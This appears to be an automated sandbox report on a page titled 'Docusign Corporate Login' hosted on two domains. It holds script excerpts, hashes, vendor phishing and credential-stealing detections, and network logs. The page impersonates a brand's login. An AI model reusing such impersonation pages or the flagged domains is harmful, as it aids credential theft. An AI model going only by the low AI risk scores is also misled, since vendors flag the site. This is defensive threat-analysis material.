URL: https://online-ops.mypasschange.com/landingPage/2/... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a legitimate implementation of a web interaction tracking functionality. It uses standard web APIs like `fetch` and `setTimeout` to record user interactions on a landing page. The code does not exhibit any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The use of a delay function and the conditional check for a single session execution are common practices to mitigate bot-related issues. Overall, this script seems to be a benign implementation of a typical web analytics or user interaction tracking feature." }
function sleep(ms) { return new Promise(resolve => setTimeout(resolve, ms)); } document.addEventListener("DOMContentLoaded", async () => { const guid = path.substring(lastSlashIndex + 1); const step_id_number = "2"; const qr_request = "False".toLowerCase() === "true"; // Ensure the function is called only once per session const params = { guid, step_id: step_id_number, qr_request}; await sleep(1000); // assuming that it might help against bot clicks fetch("/api/landingPage/web_interaction", { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(params) }).then(response => { if (response.ok) { console.log("Interaction recorded successfully"); } else { console.error("Failed to record interaction"); } }).catch(error => { console.error("Error:", error); }); });
URL: https://online-ops.mypasschange.com/static/lib/pas... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript code appears to be a password meter utility that analyzes the strength of a password. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is well-documented, open-source, and licensed under the MIT license, indicating a legitimate purpose. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script is likely benign and can be considered low risk." }
/ Original File: password-meter.js Created by: Rene Schwietzke (mail@03146f06.net) Created on: 2008-12-01 Last modified: 2014-08-20 Version: 2.0.0 The MIT License (MIT) ------------------------------------------------------------------------- Copyright (C) 2014 Rene Schwietzke Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Inspired by work by Jeff Todnem published under GPL 2. Original File: pwd_meter.js (http://www.passwordmeter.com/) Created by: Jeff Todnem (http://www.todnem.com/) History: ------------------------------------------------------------------------- v1.0.0 : initial version v1.0.1 : fixed rounding problem by adjusting float2str v1.0.2 : fixed influence of redundancy on long passwords. More bad characters after a good start should not be punished v1.1.0 : Introduced significance to cover the case of old system, where you can type in long passwords, but only the first 8 characters are considered. So now, the first characters are more important and a good end cannot fix the password when it started bad. v2.0.0 : Pay more attention to length. Tests Refactored code Changed license to MIT-license ToDo: ------------------------------------------------------------------------- ** * Punish first or last letter uppercase characters only ** * Punish numbers only at the end ** * Filter common patterns, such as 12.12.2008 12/20/2009 2008-12-13 **/ PasswordMeter.prototype = ( { // the version of the password meter version: "2.0.0", COMPLEXITY: { VERYWEAK: 0, WEAK: 1, FAIR: 2, GOOD: 3, STRONG: 4 }, STATUS: { FAILED: 0, PASSED: 1, EXCEEDED: 2 }, // little string helper to reverse a string strReverse: function(str) { var newstring = ""; for (var s = 0; s < str.length; s++) { newstring = str.charAt(s) + newstring; } return newstring; }, int2str: function(aNumber) { if (aNumber == 0) { return "0"; } else { return parseInt(aNumber, 10); } }, float2str: function(aNumber) { if (aNumber == 0) { return "0.00"; } else { return parseFloat(aNumber.toFixed(2)); } }, // helper for the status // <0 failed // 0 passed // >0 exceeded determineStatus: function(aNumber) { if (aNumber == 0) { return this.STATUS.PASSED; } else if (aNumber > 0) { return this.STATUS.EXCEEDED; } else { return this.STATUS.FAILED; } }, // helper for the st

Process:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	10668
Entropy (8bit):	5.03362850839019
Encrypted:	false
SSDEEP:	192:9sD72BInxh1RZ+3x9z6APsky0RXiRLIhWSCSztz6zTQtedFZ9BeMPn8K2Y:mGInxh1RZU1BzpuBBP8K3
MD5:	A6CD7483448834A0DEA034666446E37B
SHA1:	ED9C857FE543C72C39FAABAC13C05827E48CF890
SHA-256:	E4796F2ED9CF4DC41019F943B9DB4FEA8DEBC5BD551AE774FDBFA4C9FDEC7ECF
SHA-512:	01CF68570AB3D36889B5C7750D42BBFD02929DC27371F0D09AE121E5719D781E7D47E88A9A48ECD8F8F9B289D138937ED34BC704196377B6CD27A4764B8B2AB5
Malicious:	false
Reputation:	low
URL:	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102
Preview:	<!DOCTYPE HTML PUBLIC>.<html>.<head>..<meta charset="utf-8">....<script src="/static/lib/jquery-1.11.1.min.js" type="text/javascript"></script>......<script src="/static/lib/password-meter.js" type="text/javascript"></script>..<link rel="stylesheet" href="/static/css/landing/landing.css">........</head>.<body>..<!DOCTYPE html>..<html>..<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">...<title>Docusign Corporate Login</title>...<style type="text/css">html, body, #container {.. min-height: 100%;.. width: 100%;.. height: 100%;.. font-family: Arial, sans-serif;.. color: #404041;... background-color: rgb(234,234,234);.. }.... body {.. margin: 0;.. }..........top-div{... width:100%;......position:absolute;....background-image: url('/static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png');....background-repeat: no-repeat;...}.......form-div {....display: block;....width:843px;....height:270p

Source: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Avira URL Cloud: detection malicious, Label: phishing
Source: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Source: https://online-ops.mypasschange.com/static/css/landing/landing.css	Avira URL Cloud: Label: phishing
Source: https://online-ops.mypasschange.com/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://online-ops.mypasschange.com/static/images/phishing/DocusignDigitallySignDocument/landingPage/login-form.png	Avira URL Cloud: Label: phishing
Source: https://secure-directory.net-link-secure.com/static/css/landing/landing.css	Avira URL Cloud: Label: phishing
Source: https://online-ops.mypasschange.com/static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png	Avira URL Cloud: Label: phishing
Source: https://online-ops.mypasschange.com/static/lib/password-meter.js	Avira URL Cloud: Label: phishing
Source: https://online-ops.mypasschange.com/api/v2/decoy/web/login	Avira URL Cloud: Label: phishing
Source: https://secure-directory.net-link-secure.com/static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png	Avira URL Cloud: Label: phishing
Source: https://secure-directory.net-link-secure.com/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://online-ops.mypasschange.com/api/landingPage/web_interaction	Avira URL Cloud: Label: phishing
Source: https://secure-directory.net-link-secure.com/static/lib/password-meter.js	Avira URL Cloud: Label: phishing
Source: https://online-ops.mypasschange.com/static/lib/jquery-1.11.1.min.js	Avira URL Cloud: Label: phishing
Source: https://secure-directory.net-link-secure.com/api/landingPage/web_interaction	Avira URL Cloud: Label: phishing
Source: https://secure-directory.net-link-secure.com/static/lib/jquery-1.11.1.min.js	Avira URL Cloud: Label: phishing

Source: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Page Title: Docusign Corporate Login
Source: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Page Title: Docusign Corporate Login
Source: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102	Page Title: Docusign Corporate Login
Source: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102	Page Title: Docusign Corporate Login

Source: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	HTTP Parser: Number of links: 0
Source: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102	HTTP Parser: Number of links: 0

Source: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	HTTP Parser: No favicon
Source: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102	HTTP Parser: No favicon

Source: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	HTTP Parser: No <meta name="author".. found
Source: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102	HTTP Parser: No <meta name="author".. found

Source: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	HTTP Parser: No <meta name="copyright".. found
Source: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102	HTTP Parser: No <meta name="copyright".. found

Source: global traffic	HTTP traffic detected: GET /landingPage/2/fbb0559ebe1911efb53c0242ac190102 HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/lib/jquery-1.11.1.min.js HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/css/landing/landing.css HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/lib/password-meter.js HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/lib/jquery-1.11.1.min.js HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/lib/password-meter.js HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/images/phishing/DocusignDigitallySignDocument/landingPage/login-form.png HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/landingPage/web_interaction HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/images/phishing/DocusignDigitallySignDocument/landingPage/login-form.png HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/v2/decoy/web/login HTTP/1.1Host: online-ops.mypasschange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /landingPage/3/fbb0559ebe1911efb53c0242ac190102 HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://online-ops.mypasschange.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/lib/jquery-1.11.1.min.js HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/css/landing/landing.css HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/lib/password-meter.js HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/lib/jquery-1.11.1.min.js HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/lib/password-meter.js HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/landingPage/web_interaction HTTP/1.1Host: secure-directory.net-link-secure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: online-ops.mypasschange.com
Source: global traffic	DNS traffic detected: DNS query: secure-directory.net-link-secure.com

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 10:32:15.406610012 CET	53	54821	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:15.488080025 CET	137	137	192.168.2.22	192.168.2.255
Dec 27, 2024 10:32:15.715423107 CET	53	52781	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:16.242386103 CET	137	137	192.168.2.22	192.168.2.255
Dec 27, 2024 10:32:17.002748013 CET	137	137	192.168.2.22	192.168.2.255
Dec 27, 2024 10:32:18.616904020 CET	53	62672	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:19.675230980 CET	54842	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:19.675380945 CET	58105	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:19.797863960 CET	53	58105	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:19.798230886 CET	53	54842	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:20.680537939 CET	57390	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:20.683455944 CET	58095	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:21.050048113 CET	53	58095	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:21.053838015 CET	53	57390	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:24.016796112 CET	55939	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:24.017378092 CET	49608	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:24.387425900 CET	53	49608	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:24.390609980 CET	53	55939	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:25.708206892 CET	53	50568	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:35.602579117 CET	53	53406	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:40.992243052 CET	54521	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:40.998653889 CET	49750	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:41.364792109 CET	53	54521	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:41.375091076 CET	53	49750	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:42.469151020 CET	53	63373	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:44.229574919 CET	58971	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:44.229860067 CET	51014	53	192.168.2.22	8.8.8.8
Dec 27, 2024 10:32:44.603641987 CET	53	58971	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:44.605716944 CET	53	51014	8.8.8.8	192.168.2.22
Dec 27, 2024 10:32:53.113255978 CET	53	61598	8.8.8.8	192.168.2.22
Dec 27, 2024 10:33:11.249506950 CET	53	65080	8.8.8.8	192.168.2.22
Dec 27, 2024 10:33:15.369649887 CET	53	62439	8.8.8.8	192.168.2.22
Dec 27, 2024 10:33:32.057720900 CET	53	56308	8.8.8.8	192.168.2.22

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 27, 2024 10:32:15.716027021 CET	192.168.2.22	8.8.8.8	d03b	(Port unreachable)	Destination Unreachable
Dec 27, 2024 10:32:25.708286047 CET	192.168.2.22	8.8.8.8	d04e	(Port unreachable)	Destination Unreachable
Dec 27, 2024 10:33:15.370379925 CET	192.168.2.22	8.8.8.8	d044	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:22 UTC	717	OUT	GET /landingPage/2/fbb0559ebe1911efb53c0242ac190102 HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:23 UTC	326	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:22 GMT Content-Type: text/html; charset=utf-8 Content-Length: 10668 Connection: close X-Frame-Options: SAMEORIGIN Vary: origin Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block
